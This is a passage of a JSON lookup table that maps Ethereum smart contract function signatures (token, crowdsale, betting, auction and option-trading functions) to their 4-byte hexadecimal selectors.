"_bptc(uint256,uint256,uint256,uint256,address)": "0xd3115524", "_bpto(uint256,uint256,uint256,uint256,address)": "0x7241eb8c", "putStcWithBtc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x4abd8e01", "putStcWithBto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0xfe968ade", "putStoWithBtc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x18a94030", "putStoWithBto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x3e0831e2", "putBtcWithStc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0xb5fea522", "putBtcWithSto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x3e0efe67", "putBtoWithStc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x2442cfec", "putBtoWithSto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0xcead4620", "settleCall(uint256,uint256,address)": "0xccee8047", "exerciseCall(uint256,uint256,uint256)": "0x4950b392", "_sctc(uint256,uint256,uint256,uint256,address)": "0xe3fcf122", "_scto(uint256,uint256,uint256,uint256,address)": "0xa5e2dbfb", "_bctc(uint256,uint256,uint256,uint256,address)": "0x3c3d9ada", "_bcto(uint256,uint256,uint256,uint256,address)": "0x86f1865d", "callStcWithBtc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0xb6fac235", "callStcWithBto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x9d66e913", "callStoWithBtc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x10e0ebb3", "callStoWithBto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0xa7d0f8af", "callBtcWithStc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0xef2b04d1", "callBtcWithSto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x748467b9", "callBtoWithStc(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x4286ed3e", "callBtoWithSto(uint256,uint256,bytes32,uint256,uint256,uint256,uint256,bytes32,bytes32,uint8)": "0x654e27f9", "setFeeSchedule(uint256,uint256,uint256,uint256)": "0xd4b8a6f1", "_subDai(uint256,address)": "0xc345b571", "_addDai(uint256,address)": "0xe415f4ee", "_subEth(uint256,address)": "0x01a77625", "_addEth(uint256,address)": "0x1113f2e6", "depositDaiFor(uint256,address)": "0x517b2fa8", "withdrawDai(uint256,address)": "0xe0e8823c", "depositDai(uint256)": "0x35842f74", "addBet(uint256,uint256)": "0x23158cae", "issueToken(address,address,uint256,uint256,uint256,uint256)": "0x90778ab9", "cancel2(uint256)": "0xc19dd320", "cancel1(uint256)": "0x84a64c12", "accept2(uint256)": "0xafb3a8e9", "accept1(uint256,uint256)": "0x4876a339", "judge(uint256,bool)": "0x41a08aaf", "p2Of(uint256)": "0x66e264be", "p1Of(uint256)": "0xe8d6f62d", "to_end_ico()": "0x4541c39c", "monthly_token_growth()": "0x3639dda5", "to_start_ico()": "0x27a21061", "CCCoin()": "0x39aee3b1", "minechaincointest(uint256,string,uint8,string)": "0x7e835e86", "xToken(address,string,string,uint8,uint256)": "0x00bc83a9", "IssueTokensToInvestors(address,uint256)": "0x45b660bd", "TransferUnsoldTokensBackToTokenContract(address)": "0x8cfae7e4", "DetailedERC20()": "0x7c134a38", "Gomblot()": "0xda4d2615", "TokenContract()": "0x9688738b", "TridentToken(uint256,string,uint8,string)": "0x464deba6", "xxx7Coin()": "0xfa009e36", "DNAc()": "0xf2c51f9d", "confirmReceivedAt(uint256)": "0x85be8fe6", "returnMoneyToBuyers()": "0x5d6ceeb5", "getBuyerInfoAt(uint256)": "0x6a6e88ba", "MicoinToken(uint256,string,string)": "0x847dc59e", "ownerSetdiceRollAddress(address)": "0x2781c3d1", "seTJackpotPersent(uint256)": "0x9b06e9f5", "sendJackpot(address,uint256)": "0x6c32e01c", "addPlayer(address)": "0xb1275f9a", "getWinnerHistory(uint256)": "0xd34e4b20", "ICBCCoin()": "0x058206d9", "SNDToken(address,string,string,uint256,uint256)": "0x9c351fec", "OrxERC20()": "0x8582b7dd", "CryptoSoft()": "0xfc0c3460", "takeout(uint256)": "0xeee56b7a", "SnailToken(uint256,string,uint8,string)": "0xb65cb801", "PsyMultiSig(address[],uint256)": "0x891fa67d", "AQUAOIN()": "0xa723cda8", "setstring(string,string)": "0xd2e1d201", "LVX()": "0xbee28042", "ReyNetMax()": "0x2e7fa0bb", "STREAMING()": "0xf087d2ec", "JTU()": "0x97fb2a14", "NuoBaoChainToken(uint256,string,uint8,string)": "0xcc88be52", "CyteCoinERC20Token()": "0x9f6a4fbe", "QWHappy()": "0x1a700a95", "UnionChain()": "0x82dc5c9d", "CryptoStrategiesIntelligence()": "0xa1ceb359", "ChinaLifeCoin(uint256,string,uint8,string)": "0x74ef109b", "distributeEth(uint256,uint256)": "0xcf7dcc15", "setTotalWeiToBeDistributed(uint256)": "0xafc83802", "Minaxis()": "0x0091d862", "IGTSGD()": "0x95dcac25", "MANHATTANPROXY8THAVE()": "0x4163afb6", "UECToken(address,uint256)": "0x1ffe3c9b", "KaratBankCoin()": "0xed621591", "TalentEducationToken()": "0xab165623", "Dexter()": "0x4cf2c2a2", "getPermissions(address)": "0x160a7925", "setContract(string,address)": "0x3f0ed0df", "GointoMigration(address)": "0xfbbcb4de", "EtherBlock()": "0xcdf93c0f", "EthereumEra()": "0x201f1506", "buyKey()": "0xe95db6f9", "GlobalChain()": "0xb18ef18c", "getFreezeTimestamp(address)": "0x9c4b9c8a", "setFreeze(address,uint256)": "0x376db394", "isFreeze(address)": "0xff192bc8", "CrypexToken()": "0xe6bc5269", "setOraclizeDelay(uint256)": "0x372ed8cc", "setOraclizeBytes(uint256)": "0xacd256db", "setOraclizeGasCost(uint256)": "0xe560bf2e", "cleanupOdd()": "0xd7304b09", "cleanupEven()": "0x88865ee3", "getWinningsBalance(address)": "0xb5f2054b", "determineWinnerOdd(string)": "0x4533f779", "determineWinnerEven(string)": "0x236571e2", "determineWinner(string)": "0x54718917", "placeBetOdd(uint256)": "0x6eef0326", "placeBetEven(uint256)": "0x54828eb7", "RandomExample()": "0x949f80b0", "ScriptCallable()": "0x6f181303", "RublixToken(uint256,address)": "0x06cd4728", "signupUserWhitelist(address[],uint256)": "0x17158228", "newLockUpAddress(address)": "0xdd510e98", "setMarket(address)": "0x6dcea85f", "SetUSDPerETH_byContract(uint256)": "0xa0e8ef3d", "setUSDPerETH(uint256)": "0xaf475a9b", "fundPos()": "0xf44544b3", "setFunding(uint256,uint256,uint256,uint256,uint256,bool,uint256)": "0x4373f3b4", "init(address,address,address,uint256,uint256)": "0x0145e333", "_processPurchase(address,uint256,uint256)": "0x209164d5", "_postValidatePurchase(address,uint256,uint256)": "0x939d8729", "_updatePurchasingState(address,uint256,uint256)": "0x473528b2", "addTime(uint256,uint256)": "0x791581c6", "ToperCoin()": "0xc2c7ff0a", "CompalTestCoin1(string,string,uint256,uint256)": "0x69606c61", "ERC20Token(string,string,uint256,uint256)": "0x3bc3c7f9", "WDNA()": "0xb0cae18a", "burn(uint256,uint256,uint256)": "0x05a10028", "Burner(address,address)": "0x56a7b0bf", "PFAToken()": "0xfefb94a5", "DWBTPreICO(address,address,uint256,uint256,uint256,uint256)": "0x2219a95b", "setFoundersTokensWalletSlave(address)": "0xe064bc82", "setFoundersTokensWalletMaster(address)": "0x396ff799", "ITO()": "0x15154aff", "GCAP()": "0x8bcf0eea", "onlyBouncerExecuteDelegatecall(address,uint256,bytes)": "0x82e6bbd2", "onlyBouncerRemoveExtension(address)": "0x61775ee1", "sha256ofString(string,string)": "0x119fdee2", "onlyBouncerAddExtension(address)": "0x3cfd78f3", "Connections()": "0xaa5583d7", "onlyBouncerSetGasRefund(bool)": "0xb1bbc6f5", "getConnection(address,address,bytes32)": "0x7858651e", "extensionByIndex(uint256)": "0x98413ff1", "getEntity(address)": "0x75894e8c", "extensionsCount()": "0x5b7991cd", "removeConnection(address,address,bytes32)": "0xc173508b", "removeRoles(bytes32[],address,address)": "0x94018e20", "transferEntityOwnerPull(address)": "0x6f5da961", "addRoles(bytes32[],address,address)": "0x345899fe", "transferEntityOwnerPush(address,address)": "0x39ea68ba", "isValidDataHash(bytes32,bytes)": "0xf2b4c1b9", "editEntity(address,bool,bytes32)": "0x1d0192e1", "isValidSignature(address,address,bytes)": "0x6a7a88aa", "createVirtualEntity()": "0x693e26dd", "removeBouncer(address)": "0x1479290e", "createUser()": "0x25ad91ce", "addBouncer(address)": "0x888764c8", "checkRole(address,bytes32)": "0x2ae8a7e3", "buyerAddressTransfer(uint256,address,address)": "0x270e4cf0", "releaseByCount(address,uint256)": "0x400adee3", "setCriterionTime(uint256)": "0x31f1fd2b", "getEtherAmount(uint256)": "0xc81c590d", "GslStandardToken(uint256,string,uint8,string)": "0x5c2ccaba", "addPurchased(uint256,uint256,uint256)": "0x44b0245d", "setPurchased(address,address,uint256,uint256)": "0x519d1059", "setLockup(uint256)": "0x6ae6b459", "setExceed(uint256)": "0x7f4a1c52", "setMaxcap(uint256)": "0xf9307837", "ZBCToken()": "0xe253c21d", "BDIToken()": "0x1cde3cde", "CreateTestCoin()": "0x5bd9abfb", "Transformers()": "0x3dd82637", "BlessingChainAlliance()": "0xfdbc938d", "compareStages(string,string)": "0xada636ce", "CoinPreSale(uint256,uint256,address,address,uint256,uint256,uint256,uint256)": "0xaf19f0d1", "TestKeiosToken()": "0x394479c5", "MarbellaCoin(uint256,string,uint8,string)": "0x648351b9", "mintCoins(uint256)": "0xa77b6efb", "authorizeStore(address)": "0xb489b365", "EndAuction()": "0x6a7798ee", "FraCoinAuct(string,uint256,uint256,address)": "0x08658523", "FireToken()": "0x98f22786", "moiTestToken()": "0x2c791826", "getAllArea()": "0x4bbaa946", "getSquareArea(uint256)": "0xede5a07d", "constructor(address)": "0xf8a6c595", "getRectangleArea(uint256,uint256)": "0x60084004", "single_card()": "0x6c7018cf", "reading_card_at(uint8)": "0x79758d46", "has_reading()": "0xd3775371", "reading_length()": "0x81d44053", "reading_card_reversed_at(uint8)": "0xe3153827", "random_bool(uint8)": "0xb90b09c0", "GruffinzContact()": "0xef9521ea", "BlockFundIncubatorToken()": "0xc5ddb614", "NeoBitToken()": "0x0e848c1d", "QoppaCoin()": "0x0911def1", "Reek()": "0xc94fbd4b", "ContractiumToken()": "0x8db518f3", "withdrawTrackOf(string)": "0xf6b5460f", "withdrawToken(address,uint256,string)": "0x14eaa43b", "resetOfferingStatus()": "0x91149e85", "burnRemainTokenOffering()": "0x65b686b0", "updateBurnableStatus(bool)": "0xf0c5a77b", "updateStartTime(uint256)": "0x06bcf02f", "startOffering(uint256,uint256,uint256,uint256,bool)": "0x46848114", "resumeOffering()": "0x6b8263ed", "stopOffering()": "0xc488d6f2", "preValidatePurchase(uint256)": "0xd635b69f", "burnUnused()": "0xd36e9ac3", "IcoTokenMock(address)": "0x138e2317", "ExchangeableToken(address)": "0x4e228d8f", "XTOToken()": "0x86e99bdb", "onlyAdminAndNotFinal()": "0x038b117b", "initializeCrowdsale()": "0x0dec5d85", "CONFIGURE(bytes32,bytes32)": "0xd9214848", "updateTierDuration(uint256,uint256)": "0x8c64400d", "whitelistMultiForTier(uint256,address[],uint256[],uint256[])": "0x5dc10a45", "createCrowdsaleTiers(bytes32[],uint256[],uint256[],uint256[],bool[],bool[])": "0xa5cf38da", "updateGlobalMinContribution(uint256)": "0xe21b0b95", "ADD_TIERS(bytes32)": "0x0e21a6a6", "MIN_UPDATE(bytes32)": "0xabfc3db2", "BlueDragon()": "0x8670cc7c", "getCurrentExchageETH()": "0x0186c36e", "getSecondStageWallet()": "0xff1d20b5", "getFirstStageWallet()": "0x2d93d3ac", "getPreSaleWallet()": "0x9990b3a3", "compute()": "0x1a43c338", "getClosedSaleWallet()": "0x613f7665", "getCompanyWallet()": "0x8b144851", "unset(bytes12)": "0xe0a1fdad", "getContributorsWallet()": "0x8b67d56e", "setNext(bytes12)": "0xf2c5925d", "getMarketWallet()": "0x3b99915d", "setMin(uint96)": "0x6ba5ef0d", "getTranscoder(address)": "0x5dce9948", "delegatorStatus(address)": "0x1544fc67", "transcoderStatus(address)": "0x8b2f1652", "pendingFees(address,uint256)": "0xf595f1cc", "pendingStake(address,uint256)": "0x9d0b2c7a", "claimEarnings(uint256)": "0x24b1babf", "unbond()": "0x5df6a6bc", "bond(uint256,address)": "0xb78d27dc", "transcoder(uint256,uint256,uint256)": "0x85aaff62", "setMaxEarningsClaimsRounds(uint256)": "0x72d9f13d", "setNumActiveTranscoders(uint256)": "0x673a456b", "setNumTranscoders(uint256)": "0x60c79d00", "setUnbondingPeriod(uint64)": "0xf10d1de1", "BondingManager(address)": "0xc03ce1d8", "depositCharge()": "0x58b5525d", "stopCharging()": "0x60095dcb", "updatePower(uint256)": "0xd3451379", "startCharging()": "0x8caba7b7", "notifyCharge()": "0xbb38be10", "ChargeStation(address,uint256)": "0x05dae1f9", "createNewContract(string,string)": "0xc4a5350d", "getContract(address)": "0x0ad1c2fa", "testDecimalsUsingDeployedContract()": "0x27a5e952", "stopWork()": "0x096d740b", "callTokenHolderTribunal(string)": "0xe3e2342f", "RateClient(uint256)": "0x48c22f3f", "PayFreelancer(int256)": "0xee74612b", "getBidFreelancer(uint256)": "0xba83d63d", "getBidPrice(uint256)": "0x9b013aee", "addBid(uint256)": "0x14b0e266", "getNumberOfBid()": "0x1d291990", "getChosenFreelancer()": "0xb490e79f", "getStateofContract()": "0xd49dd9a8", "getStateofContractString()": "0xea00a289", "getLink()": "0xe2d84e23", "BlocklancerEmploymentContract(string,address)": "0x7cc589f9", "KudosPresaleTokenLockup(address,address)": "0x6d44a9cf", "payRent(uint256)": "0xd9e8843f", "changeTenant(address)": "0x06f4b12e", "AddressDemo()": "0x25982586", "test_0_ensureRegistryFunctions()": "0x5692e54e", "FakeMembershipRegistry(address)": "0xefc1ba92", "FlightDelayLedger(address)": "0xe4dbf719", "closeChannel(uint8,uint256,bytes32[4])": "0x9acd07b5", "verifyMessage(uint8,uint256,bytes32[4])": "0xfca3644a", "getChannelId(address)": "0xeb295b27", "openChannel()": "0x89be87a1", "setConfig()": "0x8b673e7a", "Setup(address)": "0x9cdacdb3", "replaceOwnerIndexed(address,address,uint256)": "0x8a88c4fe", "_random_empty_location()": "0xc062ef86", "register_creature(address)": "0x86acb16d", "all_creatures_for_species(uint256)": "0xd0dc0a04", "add_creature(address,string)": "0xbffb10de", "set_devcon_map()": "0xf8125093", "MultiplyContract(address,uint256,uint256,uint256,uint256,uint256)": "0xe22955c6", "get_master(bytes32)": "0xd54ac04d", "get_perms(bytes32)": "0x24a684e1", "modify_perms(bytes32,bytes32,int256)": "0xb8f2bbac", "del_user(bytes32,bytes32)": "0x86e58bef", "add_user(bytes32,bytes32,int256)": "0x9ab7f298", "nfc_simplehq()": "0x73815ab7", "transferPrivilege(string,address)": "0xa7cd21ea", "revokePrivilege(string)": "0x8ae4200a", "createPrivilege(string,address,address)": "0x45d4cf2b", "test_token_fall_back()": "0xb0b2b499", "TokenReceivingEchoDemo(address)": "0x9b3e28cc", "DebugContract()": "0x74b57486", "linkFileToTask(address,bytes32)": "0x78ed2178", "linkTeamToUser(address,bytes32)": "0x6eb47ea7", "linkTaskToUser(address,address)": "0x5aa720c3", "AccountGasLimitReached()": "0xfa066fbd", "getCurrentVersion()": "0xfabec44a", "getWinner(address,uint256)": "0xacc907a9", "finishBallot(bytes32)": "0x6faaeca2", "getProposalIndex(address,uint256,bytes32)": "0x9987b2d2", "getVotedData(address,uint256,address)": "0xfa5ef276", "getVotesCount(address,uint256,bytes32)": "0xbbc64582", "getVoted(address,uint256)": "0x0c693110", "startNewBallot(bytes32,bool,bytes32[])": "0xf3df0bbe", "isVoted(address,uint256)": "0x8ee36f05", "getBallotIndex(address,bytes32)": "0x99cac223", "getProposalsNum(address,uint256)": "0x818211f8", "getBallotsNum(address)": "0xe2e1ff4d", "setEmployer(string)": "0x8f778bb9", "registerEmployer(string,string,bytes32,uint256,uint256,uint256[],string,string,string)": "0x740a2a90", "setFreelancer(bool,string,uint256,uint8,uint256[],uint256[],string)": "0x54c51813", "registerFreelancer(string,string,bytes32,uint256,uint256,uint256[],string,string,bool,string,uint256,uint8,uint256[],uint256[],string)": "0xdb8ecf34", "setUser(string,string,bytes32,uint256,uint256,uint256[],string,string)": "0xfb71807f", "EthlanceUser(address)": "0x3c41c816", "test_fiveAssertTrue()": "0x10a3ec4f", "test_fiveAssertFalse()": "0x8f1c204c", "test03AliceBuyToken()": "0x96c5743a", "test02BuyToken()": "0xb842eef2", "test01CrowdsaleInit()": "0x6aefef17", "_ifEvenThenOddTooFlags(uint256)": "0xdedb7e25", "_isFullOrNull(uint256,uint256)": "0xbe96bb92", "_hasFlags(uint256,uint256)": "0xf729688e", "_hasFlag(uint256,uint256)": "0x604b2399", "capReached()": "0x4f935945", "itemBid(uint256)": "0x1b9414ae", "itemCancelMarketsWhenPaused(uint256)": "0x70d19a43", "itemCancelMarkets(uint256)": "0x7a1a7e7f", "_itemCancelMarkets(uint256)": "0xdad52c72", "_itemRemoveMarkets(uint256)": "0x6f1ae5de", "createItemSaleMarkets(uint256,uint256)": "0x5c239e58", "createItems(uint256[],address[])": "0xa7e47920", "processHunting(uint256,uint256,uint256[])": "0x1b78e3c4", "usedItem(uint256)": "0xc7b0fc5e", "equipmentItem(uint256[],uint256[],uint256)": "0x56e9ec88", "_createItem(uint256,uint256,uint256,uint256,address)": "0x7805a548", "_createRocHunting(uint256,uint256)": "0xefacd73b", "getRocCoreAddress()": "0x1f1bd005", "setRocCoreAddress(address)": "0x513a0149", "getItemIdToTokenId(uint256)": "0x016e03b1", "setHuntingPrice(uint256)": "0x80dceec4", "GetSignVersion(string,address,uint256)": "0xe3f38dd6", "GetSign(string,address)": "0x5187a7d7", "setEditionName(uint8,string)": "0xff0ec23e", "_improveCard(uint256,uint256,uint256)": "0xde583ed3", "SUAPPToken()": "0x79a9fd36", "separate(address,uint256)": "0x1e96bf0e", "YunbeiToken(uint256,string,string)": "0xa7e1c4ac", "setAtomIsReady(uint256,uint32)": "0x619a794d", "setAtomIsBuy(uint256,uint128)": "0x41354590", "setAtomIsRent(uint256,uint128)": "0xf630a468", "setAtomMoth(uint256,uint64)": "0x5c8d1a6b", "setAtomFath(uint256,uint64)": "0xf09e65f1", "setAtomSons(uint256,uint32)": "0x558225fc", "setAtomCool(uint256,uint8)": "0xeda8669e", "setAtomLev(uint256,uint8)": "0x2630d97d", "setAtomGen(uint256,uint8)": "0x94be2423", "setAtomDna(uint256,uint64)": "0x06c01551", "pushAtom(uint64,uint8,uint8,uint8,uint32,uint64,uint64,uint128,uint128,uint32)": "0xfecadafd", "setAtomOwner(uint256,address)": "0x35d1f869", "setOwnerAtomsCount(address,uint256)": "0x1cf91bf2", "setBonusReceived(address,bool)": "0xb766b562", "setDnaExist(uint64,bool)": "0x75fe2cb8", "incRandNonce()": "0xb3cd95d3", "createCustomAtom(uint64,uint8,uint8,uint8,uint128,uint128,uint32)": "0xb93fd2bf", "CryptoAtoms()": "0x31bcce1c", "transferContract(address,address,address)": "0xf9dfcfcc", "transferAdmin(address,address)": "0xe9ee6eeb", "getOwnedTokens()": "0x60820d80", "getTokenOrder(uint256)": "0x7c52b934", "getOrders(address)": "0x093376fe", "StartDistribution()": "0xd085c8b8", "setWhitelistedWallet(address,bool)": "0x59084ea9", "removeBorrower(address)": "0x76c7fc55", "addBorrower(address)": "0xe3a8e29c", "_guarantedBid(uint256)": "0xb350723f", "_removeBid(uint256)": "0x6eb1546d", "ZionToken()": "0x370943e3", "assert1(bool)": "0x59eecbf9", "ECASH()": "0x8e52019d", "ownerAddWorkRecord(address,uint256,bytes16)": "0x3a61dbfe", "addWorkRecord(uint256,bytes16)": "0x2dd3ed9a", "tradeForTokens(address[2],address,bytes,bytes)": "0x8c155b5b", "trade(address[2],address,bytes,bytes)": "0x507eeff9", "_grantAccess(uint256,address)": "0x4b891518", "grantAccess(address,address)": "0xc6a09d95", "isCosignerSet(uint256)": "0x9666e1f9", "changeAsset(bytes32,string,string,uint8)": "0x106fcb7a", "_transferToICAP(uint256,bytes32,uint256,string,uint256)": "0xa09635b0", "_isProxy(bytes32)": "0x98e6176a", "_isSignedOwner(bytes32)": "0xad886326", "enableSwitch(bytes32)": "0x4ba4079a", "emitChange(bytes32)": "0xa4a83317", "emitTransferToICAP(address,address,bytes32,uint256,string)": "0xeacbc236", "hasRole(address,bytes32,address)": "0x2d3e579a", "claimFor(address,address,address)": "0x6bf9b731", "setContractICOAddress(address)": "0x437cfa4a", "Taur()": "0x17905b2a", "GoddessToken()": "0xdb642bce", "resumeTransfer()": "0x4c833532", "pauseTransfer()": "0x90a70139", "saleCompleted()": "0x78261878", "getContractAddr()": "0x9e455939", "CosmoCoin(address,address)": "0x8df272d2", "GeBitToken()": "0xbd96b348", "SonnetCoin()": "0xd49dd9e4", "unlockTeamAdvisorsPartnersTokens()": "0xea62f24c", "unlockFund()": "0xa1f841d7", "Millet()": "0xd3b15dd6", "MasterToken()": "0x0d1946df", "getRocIndexToOwner(uint256)": "0x4ea5a6ac", "getMarketsRocId(uint256)": "0x25686e15", "getRocrocId(uint256)": "0x51965e75", "getRoc(uint256)": "0x8119f4ae", "_computeCut(uint128)": "0xbf16ec99", "cancelMarketsWhenPaused(uint256)": "0xf2513ee9", "cancelMarkets(uint256)": "0xdd443c7b", "_cancelMarkets(uint256)": "0x5eaa6ca4", "_removeMarkets(uint256)": "0xa1b39c38", "createRocSaleMarkets(uint256,uint256)": "0x695f9db3", "freeGiveProduce(uint256,string)": "0x09265805", "giveProduce(uint256,string)": "0x72e87c35", "_createRoc(uint256,string,uint256,address)": "0x60994bb0", "getRocIdToTokenId(uint256)": "0xf6d51638", "setEvolvePrice(uint128)": "0xa9add7dc", "tokenRecovery(address)": "0x08a71396", "sendCreatorReward()": "0x213408da", "sendReward(address)": "0x9dabff25", "BB8Token()": "0xf23b55c3", "COCCToken()": "0x18d4b4b3", "setGiftToken(address)": "0x4b52f89b", "setGiftTokenAmount(uint256)": "0x73ecac3b", "testbool(bool)": "0x92a73fb8", "bytarr28(bytes28[])": "0xe46c2cc4", "OzsToken()": "0x45c1523a", "operator(address)": "0x9a307391", "ROBIES()": "0x842c45c5", "decreaseFrozenBalances(address,uint256)": "0x6db76efd", "increaseFrozenBalances(address,uint256)": "0x8f4e5158", "_createSchedule(address,uint256,uint256,uint256,uint256)": "0xc786a66f", "createSchedule(address,uint256,uint256,uint256,uint256)": "0xb4fc3e3b", "setDividendsPercent(uint256,uint256)": "0x536d97c2", "setPayerPercent(uint256,uint256)": "0x00a6dec6", "setAdminPercent(uint256,uint256)": "0x5a4c822d", "setMinInvesment(uint256)": "0xd9f80c65", "setMaxBalance(uint256)": "0x9d51d9b7", "notContains(address)": "0x2982add7", "distributeCTS(address[],uint256,uint256)": "0x940a82a3", "Crowdtes()": "0x3da98498", "MChip()": "0xad723faa", "refundWhite(uint256,uint256,uint256)": "0x07be74b9", "updateSignedDealsCountInBulk(address[],uint256[])": "0xd67a7e5f", "g1()": "0xbdd8a366", "getvalues(uint256)": "0xbcc17ca0", "addvehicles(address,string,string,string,string,string,string)": "0xf246080a", "getCurrentResult()": "0x15616d2b", "getVotersChoice()": "0xaf91c5fd", "updateFeeWallet(address,address)": "0x25d92ee2", "_generateName(string,string)": "0xa90fcfa0", "generateRandomStats(string)": "0x53718569", "calculateDistributedIntervalEarning(uint256,uint256)": "0x424592ca", "_calculateFEE2Distribute()": "0xe23eb0c5", "setIntervalSize(uint256)": "0x287eda92", "makeSmokeymon(string,uint8)": "0xabd8537f", "transferEthBackToUser(address)": "0x07777949", "transferBlocToUser(address)": "0xfb55ed2a", "FercCoin()": "0x32a8589a", "putEth()": "0x26ef8ba1", "receiveToken(uint256)": "0x37df00c9", "buyCat(uint256)": "0xd72503ba", "createTrade(uint256,uint256)": "0x96463fc6", "registerCat(uint256,uint256,uint256,uint256,uint256,uint256)": "0x38453f29", "validateTransfer(uint256)": "0x069bd974", "setLuckThreshold(uint256)": "0x16a8e046", "getDeveloper(address)": "0x67e13ee0", "getDeveloper(uint256)": "0x7a276bb6", "isAccepted(address)": "0xe6f091f9", "isAccepted(uint256)": "0x29bc3b85", "getAcceptedGames()": "0xea25415a", "getGameIpfs(uint256)": "0x3246bac5", "approveByAddress(address)": "0x4beb9e32", "approveByIndex(uint256)": "0xcd46d7e5", "removeGame(uint256)": "0x73d31240", "updateGame(uint256,string,uint256)": "0xb2189168", "addGame(address,string,uint256)": "0xbee604ea", "Mycryptonline()": "0x3dc4cac9", "bionic()": "0x765c9c7f", "claimUSInvestorTokens()": "0x3d80ea28", "flagUSInvestor(address)": "0x71037b1e", "setPromoCode(address)": "0x5301fa52", "_creditTokens(address,uint256)": "0xc7a6c6d4", "_allocatePromoTokens(address,uint256)": "0x8d6a6d4b", "_allocateReferralTokens(address,uint256)": "0xf3b849d6", "ZealconToken()": "0x881fe0ce", "buy(bytes8)": "0xadfec5f5", "generateRenown()": "0x218fe479", "contribute(bytes8)": "0x3cda0b45", "PDTX()": "0x369de07d", "transferToAnotherAddr(address,address,uint256,bytes32)": "0x674aaa44", "gotransfer(uint256)": "0x16c4fcbb", "getTokensCountOfUser(address)": "0x55f953e6", "getAllChainIDsOfUser(address)": "0x9f35caee", "getAllTokensOfUser(address)": "0x65675074", "getChainDrawingsByChainID(bytes32)": "0x50591478", "getChainDrawings(uint256)": "0xad70810a", "batchCreateAuthorDrawings()": "0x1bb73a2a", "batchCreateInternalDrawings()": "0xf8a777f5", "setBatchCeateDrawingsAddress(address,address)": "0x9eeb6c11", "getAuthorDrawings(uint256)": "0x7497a061", "getInternalDrawings(uint256)": "0xdb589bbe", "isBatchCeateDrawings()": "0x697fa43d", "createInternalAuction(bytes32,bytes32,uint256,uint256,uint256,string)": "0x5b2ec3a5", "createAuthorDrawings(bytes32,bytes32,address,string)": "0x4cbe02a5", "removeFromOwnedTokens(address,uint256)": "0xd391a970", "_createDrawings(bytes32,bytes32,address,string)": "0x770bb9ae", "getAuctionTokenIDsOfOwner(address)": "0x504bcde7", "_computeCommission(uint256)": "0xa4ee7c18", "removeFromOwnershipAuctionTokenIDs(address,uint256)": "0xe640663a", "getLockingTypeCount()": "0x6515d28c", "LoyelaTestCoin()": "0x80744a9c", "Gotoken()": "0x4310033d", "Getter()": "0x1aa49291", "Setter(uint256)": "0xdd611e8d", "XYY()": "0x8ea25644", "setDividendAndPayOut(uint32,uint32)": "0x1e5393cf", "debatingPeriod()": "0x39ce3983", "MAXIMUM_ICO_TOKENS()": "0x919d3401", "frozenTokensSupply()": "0xfffdbe2c", "priceIncreasePerPurchase()": "0x3e32bea2", "getCapAmount()": "0xd8ad1c5c", "publicSaleSencPerMEth()": "0x2321e625", "CONTRIBUTIONS_MIN()": "0x2da13d5e", "minPrivateContribution()": "0x27df664b", "BID_DELAY_TIME()": "0xebef28aa", "defValue()": "0xe4f84173", "isPublicIcoActive()": "0x71863031", "startDateOfSaleStageLast()": "0xb3f2c866", "summFounders()": "0xa34f82f4", "releaseState3()": "0x31ac7253", "tokenSold()": "0x519ee19e", "_mixer()": "0xf450b574", "remainMintTokenAmount()": "0xc433e8ca", "fundsRaisedFinalized()": "0x69fc3481", "rtm_contract()": "0x119cbed6", "mainsaleRemaining()": "0xe06fc6d4", "mintC()": "0x1c7f578a", "bonusFourthWeek()": "0xd951e357", "oldMillionEther()": "0xa75688b2", "priceStage1()": "0x216de17a", "lowestAskAddress()": "0x220f1202", "exchangeWeight()": "0x8eeb203e", "LOCK_START_TIME()": "0x15f2e2f7", "TANKER_TYPE()": "0xaf4e4494", "HALT()": "0x4e1339fe", "TIER4()": "0xbeee9a34", "GBPproxy()": "0xddb25d71", "teamReserveAllocation()": "0x3743f0bf", "CheckSoftCap()": "0xe4c21cf2", "minimum_buy_value()": "0x6a67ec63", "isFirstPartReleased()": "0x2ba5390f", "DAY_LENGTH()": "0x35d6d611", "monethaVault()": "0x816dbae4", "tokenData()": "0x024fd650", "tokenTotal()": "0xb1437e27", "stageFourStart()": "0x08d39380", "RefundManager()": "0x3e799335", "minerCurrentChallenge()": "0x8074fe33", "inclusionEnExchange()": "0x5e6fa5ea", "dividendDecreaseFactor()": "0x32859392", "totalAffiliateTokensSent()": "0xe383da38", "largeContribThreshold()": "0xd426b04e", "freeSupply()": "0x24a6ab0c", "tokensForTeam()": "0xfde83a34", "enabledMint()": "0x6b5648f5", "last_transfer_state()": "0x00a8f276", "playerPull()": "0x0e83d92b", "grantsUnlock()": "0xf6ed8fe7", "mediumFunding()": "0xedd13e38", "weiRefunded()": "0x5da89ac0", "timeBetweenGames()": "0xbd05c055", "runningDebt()": "0xb1bb5fde", "_presaleStartTimestamp()": "0x665814d8", "breedTimeout()": "0x349d3dc5", "endOfPhase3()": "0xdb967d05", "saleLimit()": "0x7e26639f", "CEO_TEAM()": "0x4c1f20ec", "Date_Finished()": "0xa727632f", "communityWallet()": "0xc7574839", "tokensMintedDuringPreICO()": "0x3285ecde", "bonussale_TokenCap()": "0xa47ce954", "numberOfPurchasers()": "0x580c2ae9", "tgeSettingsBlocksPerStage()": "0xd7f59fd0", "trakToken()": "0x2f885f79", 